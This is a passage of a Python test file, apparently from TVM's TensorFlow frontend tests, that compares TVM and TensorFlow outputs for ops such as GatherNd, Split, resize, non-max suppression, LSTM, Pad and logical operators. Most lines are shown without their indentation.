tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
    def check_bias_add(lh_shape, rh_shape, dtype):
        tf.reset_default_graph()
        lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
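# Sketch of the op semantics these tests exercise (illustrative, not executed):
#   tf.split(x, 3, axis=0)          # shape (6,) -> three equal parts of shape (2,)
#   tf.split(x, [1, 2, 3], axis=0)  # shape (6,) -> parts of shape (1,), (2,), (3,)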
def _test_split(in_shape, axis, num_or_size_splits, dtype):
    """ One iteration of a Split """
    np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
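# tf.math.top_k returns the k largest values and their indices along the last
# axis; only the values output ("TopK:0") is compared here (illustrative, not executed):
#   tf.math.top_k([1.0, 5.0, 3.0], k=2)  => values [5.0, 3.0], indices [1, 2]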
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
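# Sketch of the op semantics these tests exercise (illustrative, not executed):
#   tf.tile([[1, 2], [3, 4]], multiples=[2, 3])  => shape (4, 6)
# `multiples` has one repetition count per input dimension.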
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
        out_node = [out.split(":")[0] for out in out_name]
        in_node = [inp.split(":")[0] for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
""" One iteration of resize bilinear """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
""" One iteration of resize nearest neighbor """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
""" One iteration of resize nearest neighbor for graph with dynamic input shape """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
""" Resize Bilinear, Nearest_Neighbor """
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
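# BroadcastArgs takes two shape vectors and returns their broadcast shape
# (illustrative, not executed):
#   tf.raw_ops.BroadcastArgs(s0=[4, 1, 32, 32], s1=[4, 8, 32, 32])  => [4, 8, 32, 32]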
def _test_broadcast_args(in_shape_1, in_shape_2):
""" One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
""" Resize Bilinear """
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
""" One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
""" One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
""" Resize Bilinear """
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
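# Sketch of the op semantics (illustrative, not executed):
#   tf.fill(dims=[2, 3], value=9)  => [[9, 9, 9], [9, 9, 9]]
# The tf.ones(...) graphs below typically lower to a Fill node, which is the
# path these helpers exercise with constant and non-constant shapes.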
def _test_fill(in_shape):
""" Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
""" Resize Bilinear """
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
""" Crop to bounding box """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
""" Crop to bounding box """
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
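# In tf.image.crop_and_resize, each box is [y1, x1, y2, x2] in coordinates
# normalized to [0, 1] (so [[0, 0, 1, 1]] crops the whole image), box_ind
# selects which image in the batch the box crops from, and the crop is then
# resized to crop_size.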
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
""" CropAndResize """
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
""" NonMaxSuppressionV3,5 """
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
""" CombinedNonMaxSuppression """
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
""" One iteration of a LSTM cell """
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
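# tf.stack produces a "Pack" node in the GraphDef (illustrative, not executed):
#   tf.stack([a, b], axis=0)  # a, b of shape (3, 2, 1)  => shape (2, 3, 2, 1)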
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
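# `paddings` gives [before, after] padding per dimension (illustrative, not executed):
#   tf.pad(x, [[1, 1], [2, 2]])  # x of shape (2, 3)  => shape (4, 7)
# mode="CONSTANT" with constant_values produces a PadV2 node, plain CONSTANT a
# Pad node, and SYMMETRIC/REFLECT a MirrorPad node, matching out_name below.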
def _test_pad(input_shape, paddings, mode, **kwargs):
""" One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
""" Pad """
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
